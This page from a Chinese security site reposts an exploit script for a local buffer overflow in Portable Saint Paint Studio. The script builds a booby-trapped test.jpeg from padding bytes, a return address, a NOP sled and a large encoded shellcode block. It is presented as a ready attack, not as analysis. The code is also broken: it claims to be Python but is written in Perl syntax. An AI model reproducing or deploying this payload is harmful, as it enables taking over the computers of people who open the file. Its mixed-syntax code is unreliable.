首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Portable Saint Paint Studio Local Buffer Overflow
来源:http://sec-krb.org 作者:Angel 发布时间:2011-08-29  
#!/usr/bin/python

import sys

print "####################################################################"
print "# Exploit Title: Portable Saint Paint Studio Local Buffer Overflow #"
print "# Author: Angel Injection                                          #"
print "# Email: Angel-Injection@hotmail.com                               #"
print "# Date: 26/8/2011                                                  #"
print "# Home Page: http://1337day.com http://sec-krb.org                 #"
print "####################################################################"

try :

  $junk = "\x41" * 1430
  $ret = "\x67\xD5\xEB\x6D"
  $nops = "\x90" x 10
  $shellcode=
   "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9a".
"\xb8\xbb\x46\x83\xeb\xfc\xe2\xf4\x66\xd2\x50\x0b\x72\x41\x44\xb9".
"\x65\xd8\x30\x2a\xbe\x9c\x30\x03\xa6\x33\xc7\x43\xe2\xb9\x54\xcd".
"\xd5\xa0\x30\x19\xba\xb9\x50\x0f\x11\x8c\x30\x47\x74\x89\x7b\xdf".
"\x36\x3c\x7b\x32\x9d\x79\x71\x4b\x9b\x7a\x50\xb2\xa1\xec\x9f\x6e".
"\xef\x5d\x30\x19\xbe\xb9\x50\x20\x11\xb4\xf0\xcd\xc5\xa4\xba\xad".
"\x99\x94\x30\xcf\xf6\x9c\xa7\x27\x59\x89\x60\x22\x11\xfb\x8b\xcd".
"\xda\xb4\x30\x36\x86\x15\x30\x06\x92\xe6\xd3\xc8\xd4\xb6\x57\x16".
"\x65\x6e\xdd\x15\xfc\xd0\x88\x74\xf2\xcf\xc8\x74\xc5\xec\x44\x96".
"\xf2\x73\x56\xba\xa1\xe8\x44\x90\xc5\x31\x5e\x20\x1b\x55\xb3\x44".
"\xcf\xd2\xb9\xb9\x4a\xd0\x62\x4f\x6f\x15\xec\xb9\x4c\xeb\xe8\x15".
"\xc9\xeb\xf8\x15\xd9\xeb\x44\x96\xfc\xd0\xaa\x1a\xfc\xeb\x32\xa7".
"\x0f\xd0\x1f\x5c\xea\x7f\xec\xb9\x4c\xd2\xab\x17\xcf\x47\x6b\x2e".
"\x3e\x15\x95\xaf\xcd\x47\x6d\x15\xcf\x47\x6b\x2e\x7f\xf1\x3d\x0f".
"\xcd\x47\x6d\x16\xce\xec\xee\xb9\x4a\x2b\xd3\xa1\xe3\x7e\xc2\x11".
"\x65\x6e\xee\xb9\x4a\xde\xd1\x22\xfc\xd0\xd8\x2b\x13\x5d\xd1\x16".
"\xc3\x91\x77\xcf\x7d\xd2\xff\xcf\x78\x89\x7b\xb5\x30\x46\xf9\x6b".
"\x64\xfa\x97\xd5\x17\xc2\x83\xed\x31\x13\xd3\x34\x64\x0b\xad\xb9".
"\xef\xfc\x44\x90\xc1\xef\xe9\x17\xcb\xe9\xd1\x47\xcb\xe9\xee\x17".
"\x65\x68\xd3\xeb\x43\xbd\x75\x15\x65\x6e\xd1\xb9\x65\x8f\x44\x96".
"\x11\xef\x47\xc5\x5e\xdc\x44\x90\xc8\x47\x6b\x2e\x6a\x32\xbf\x19".
"\xc9\x47\x6d\xb9\x4a\xb8\xbb\x46";

    f = open("test.jpeg" ,"w")
    f.write($junk.$ret.$nops.$shellcode)
    f.close()
except:
    print " I'am Angel Injection Member From Inj3ct0r Team " 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Groovy Media Player Version 2.
·Mini-stream Ripper 2.9.7.273 (
·Mini FTP Server 1.1 Buffer Cor
·LifeSize Room Command Injectio
·yahoo! player 1.5 (.m3u) Unive
·HTTPKiller - FHTTP Kit by Xian
·Free MP3 CD Ripper 1.1 DEP Byp
·Apache httpd Remote Denial of
·Free MP3 CD Ripper 1.1 Local B
·Sunway Force Control SCADA 6.1
·RealVNC Authentication Bypass
·Windows7/win2008 提权0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved